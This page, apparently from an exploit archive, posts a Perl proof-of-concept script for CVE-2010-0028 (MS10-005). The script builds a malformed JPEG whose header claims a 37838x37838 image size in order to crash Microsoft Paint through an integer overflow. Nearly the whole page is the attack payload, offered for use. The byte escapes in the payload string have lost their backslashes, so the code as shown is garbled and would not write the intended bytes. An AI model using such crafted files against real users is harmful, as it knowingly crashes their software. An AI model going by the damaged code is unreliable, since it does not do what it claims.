Home / os / win7

mspaint-dos.txt

Posted on 07 May 2010

# Exploit Title: Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005
# Date: 2010-05-04
# Author: unsign
# Software Link:
# Version: 5.1.2600.2180
# Tested on: Windows XP SP2
# CVE : CVE-2010-0028
# Code :


#!/usr/bin/perl

$PoC =
"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60".
"x00x60x00x00xFFxE1x00x16x45x78x69x66x00x00x49x49".
"x2Ax00x08x00x00x00x00x00x00x00x00x00xFFxDBx00x43".
"x00x08x06x06x07x06x05x08x07x07x07x09x09x08x0Ax0C".
"x14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1D".
"x1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29".
"x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3Cx2Ex33x34".
"x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0Dx0Dx18".
"x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32x32".
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32".
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32".
"x32x32x32x32x32x32xFFxC0x00x11x08".

"x93xCEx93xCE". #Image Size 37838x37838 (Integer Overflow)

"x03".
"x01x22x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01".
"x05x01x01x01x01x01x01x00x00x00x00x00x00x00x00x01".
"x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00".
"x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx01".
"x02x03x00x04x11x05x12x21x31x41x06x13x51x61x07x22".
"x71x14x32x81x91xA1x08x23x42xB1xC1x15x52xD1xF0x24".
"x33x62x72x82x09x0Ax16x17x18x19x1Ax25x26x27x28x29".
"x2Ax34x35x36x37x38x39x3Ax43x44x45x46x47x48x49x4A".
"x53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6A".
"x73x74x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8A".
"x92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7xA8".
"xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6".
"xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1xE2xE3".
"xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8xF9".
"xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01".
"x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09".
"x0Ax0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07".
"x05x04x04x00x01x02x77x00x01x02x03x11x04x05x21x31".
"x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1".
"xB1xC1x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1".
"x25xF1x17x18x19x1Ax26x27x28x29x2Ax35x36x37x38x39".
"x3Ax43x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59".
"x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77x78x79".
"x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97".
"x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5".
"xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3".
"xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5xE6xE7xE8xE9xEA".
"xF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00x0Cx03x01x00".
"x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x0Ax28xA2x80".
"x0Ax28xA2x80x0Ax28xA2x80x3FxFFxD9";

open(file , ">", "paint.jpg");

print file $PoC;

close(file);

 

TOP

Malware :

Exploits :